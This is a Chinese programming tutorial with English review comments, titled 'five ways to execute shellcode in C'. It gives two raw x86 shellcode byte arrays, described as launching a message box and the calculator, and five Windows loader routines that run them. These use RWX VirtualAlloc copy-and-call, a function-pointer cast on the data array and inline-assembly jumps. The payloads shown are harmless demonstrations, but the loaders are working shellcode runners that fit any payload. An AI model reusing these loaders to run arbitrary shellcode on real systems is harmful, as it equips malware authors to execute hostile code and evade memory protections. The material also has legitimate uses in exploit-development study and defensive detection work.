C语言执行ShellCode的五种方法

 时间:2024-10-12 09:48:48

1、下面介绍使用C语言执行ShellCode的五种方法。需要注意,这些方法只适用于Windows XP和Windows 2003操作系统。原因应当是:方法二至方法五直接跳转到数据段中的shellcode数组执行,而在启用了DEP(数据执行保护)的环境下,数据页不可执行。

2、下面给出两段可用的ShellCode代码,分别是弹出MessageBox和打开calc计算器的ShellCode代码,演示代码如下所示:

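// Step 3: shared declarations, the two sample payloads, and the program entry point.
// (Stray non-code characters that the page had injected after the #include lines
// were removed; every payload byte is reproduced unchanged.)
#include "stdafx.h"
#include <Windows.h>

// Pointer to a parameterless _stdcall routine; RunShellCode_1 uses it to call the copied buffer.
typedef void (_stdcall *CODE)();

// Build-time switch: exactly one of Calc_Test / MessageBox_Test should be defined,
// otherwise `shellcode` is either undefined or defined twice.
#define Calc_Test

#ifdef Calc_Test
// Payload selected by Calc_Test.
// NOTE(review): the published comment on this array read "pops a MessageBox" and the
// one on the MessageBox_Test array read "opens the Windows calculator". Judging by the
// macro names and by the "hello,world!" literal at the end of the other array, the two
// comments appear to have been swapped. The bytes were not disassembled for this note.
unsigned char shellcode[] =
    "\xb8\x82\x0a\x8d\x38\xd9\xc6\xd9\x74\x24\xf4\x5a\x29\xc9\xb1\x23"
    "\x31\x42\x12\x83\xea\xfc\x03\xc0\x04\x6f\xcd\x38\xf0\x2b\x2e\xc0"
    "\x01\x3f\x6b\xfc\x8a\x43\x71\x84\x8d\x54\xf2\x3b\x96\x21\x5a\xe3"
    "\xa7\xde\x2c\x68\x93\xab\xae\x80\xed\x6b\x29\xf0\x8a\xac\x3e\x0f"
    "\x52\xe6\xb2\x0e\x96\x1c\x38\x2b\x42\xc7\xc5\x3e\x8f\x8c\x99\xe4"
    "\x4e\x78\x43\x6f\x5c\x35\x07\x30\x41\xc8\xfc\x45\x65\x41\x03\xb2"
    "\x1f\x09\x20\x40\xe3\x83\xe8\x2c\x68\xa3\xd8\x29\xae\x5c\x15\xba"
    "\x6f\x91\xae\xcc\x73\x04\x3b\x44\x84\xbd\x35\x1f\x14\xf1\x46\x1f"
    "\x15\x79\x2e\x23\x4a\x4c\x59\x3b\x22\x27\x5d\x38\x0a\x4c\xce\x56"
    "\xf5\x6b\x0c\xd5\x61\x14\x2f\x93\x7c\x73\x2f\x44\xe3\x1a\xa3\xe9"
    "\xe4";
#endif

#ifdef MessageBox_Test
// Payload selected by MessageBox_Test; it ends with the literal "hello,world!".
// (See the note on the Calc_Test array about the swapped original comments.)
unsigned char shellcode[] =
    "\xEB\x42\x8B\x59\x3C\x8B\x5C\x0B\x78\x03\xD9\x8B\x73\x20\x03\xF1"
    "\x33\xFF\x4F\x47\xAD\x33\xED\x0F\xB6\x14\x01\x38\xF2\x74\x08\xC1"
    "\xCD\x03\x03\xEA\x40\xEB\xF0\x3B\x6C\x24\x04\x75\xE6\x8B\x73\x24"
    "\x03\xF1\x66\x8B\x3C\x7E\x8B\x73\x1C\x03\xF1\x8B\x04\xBE\x03\xC1"
    "\x5B\x5F\x53\xC3\xEB\x4F\x33\xC0\x64\x33\x40\x30\x8B\x40\x0C\x8B"
    "\x70\x1C\xAD\x8B\x48\x08\x58\x33\xDB\x33\xFF\x66\xBF\x33\x32\x57"
    "\x68\x75\x73\x65\x72\x8B\xFC\x53\x51\x53\x50\x50\x53\x57\x68\x54"
    "\x12\x81\x20\xE8\x8A\xFF\xFF\xFF\xFF\xD0\x8B\xC8\x68\x25\x59\x3A"
    "\xE4\xE8\x7C\xFF\xFF\xFF\xFF\xD0\x59\x68\x97\x19\x6C\x2D\xE8\x6F"
    "\xFF\xFF\xFF\xFF\xD0\xE8\xAC\xFF\xFF\xFF" "hello,world!";
#endif

// Forward declarations of the five demonstration routines.
void RunShellCode_1();
void RunShellCode_2();
void RunShellCode_3();
void RunShellCode_4();
void RunShellCode_5();

// Entry point: runs method 1 only; change the call to try another method.
int _tmain(int argc, _TCHAR* argv[])
{
    RunShellCode_1();
    return 0;
}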

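// Step 4: method 1 - copy the payload into newly allocated executable memory and call it.
//
// Fixes relative to the listing as published:
//   - stray non-code characters injected into the VirtualAlloc call were removed;
//   - a failed VirtualAlloc now returns instead of falling through to memcpy(NULL, ...);
//   - the check on memcpy's result was dropped: memcpy returns its destination pointer
//     and has no failure return, so the "WriteMemory Failed" branch could never report
//     a real error;
//   - MessageBoxA is named explicitly because the message strings are narrow literals;
//   - the region is released if the payload returns.
//
// The region is requested as PAGE_EXECUTE_READWRITE, so execution here does not depend on
// the data section being executable. An allocation that is RWX, written to and then called
// is a pattern memory-protection and EDR tooling commonly flags.
void RunShellCode_1()
{
    // Reserve and commit a block sized to the payload array (including its trailing NUL).
    PVOID p = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (p == NULL) {
        MessageBoxA(NULL, "VirtuallAlloc Failed!!!", "Prompt", MB_OK);
        return;
    }

    memcpy(p, shellcode, sizeof(shellcode));

    // Treat the start of the copied buffer as a parameterless _stdcall routine.
    CODE code = (CODE)p;
    code();

    // Reached only if the payload returns to its caller.
    VirtualFree(p, 0, MEM_RELEASE);
}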

// Step 5: method 2 - call the payload array in place through a function-pointer cast.
void RunShellCode_2()
{
    // Nothing is copied: the address of the global array is reinterpreted as a
    // void(void) function, so this runs only if the memory holding `shellcode`
    // is executable.
    void (*entry)(void) = (void (*)(void))&shellcode;
    entry();
}

// Step 6: method 3 - load the array's address with LEA and jump to it.
// Uses MSVC inline assembly, which is available only for 32-bit x86 targets.
void RunShellCode_3()
{
    __asm
    {
        lea eax,shellcode;   // eax = address of the global shellcode array
        jmp eax;             // jmp rather than call: no return address is pushed
    }
}

// Step 7: method 4 - same as method 3, but the address is loaded with MOV ... OFFSET.
// Uses MSVC inline assembly, which is available only for 32-bit x86 targets.
void RunShellCode_4()
{
    __asm
    {
        mov eax,offset shellcode;   // eax = address of the global shellcode array
        jmp eax;                    // jmp rather than call: no return address is pushed
    }
}

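// Step 8: method 5 - same as method 4, with the jump written as raw opcode bytes.
// Fix relative to the listing as published: the `offset` keyword had stray non-code
// characters injected into it by the page and did not assemble; it is restored here.
// Uses MSVC inline assembly, which is available only for 32-bit x86 targets.
void RunShellCode_5()
{
    __asm
    {
        mov eax,offset shellcode;   // eax = address of the global shellcode array
        _emit 0xFF;                 // FF E0 is the machine encoding of `jmp eax`,
        _emit 0xE0;                 // emitted byte by byte instead of as a mnemonic
    }
}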
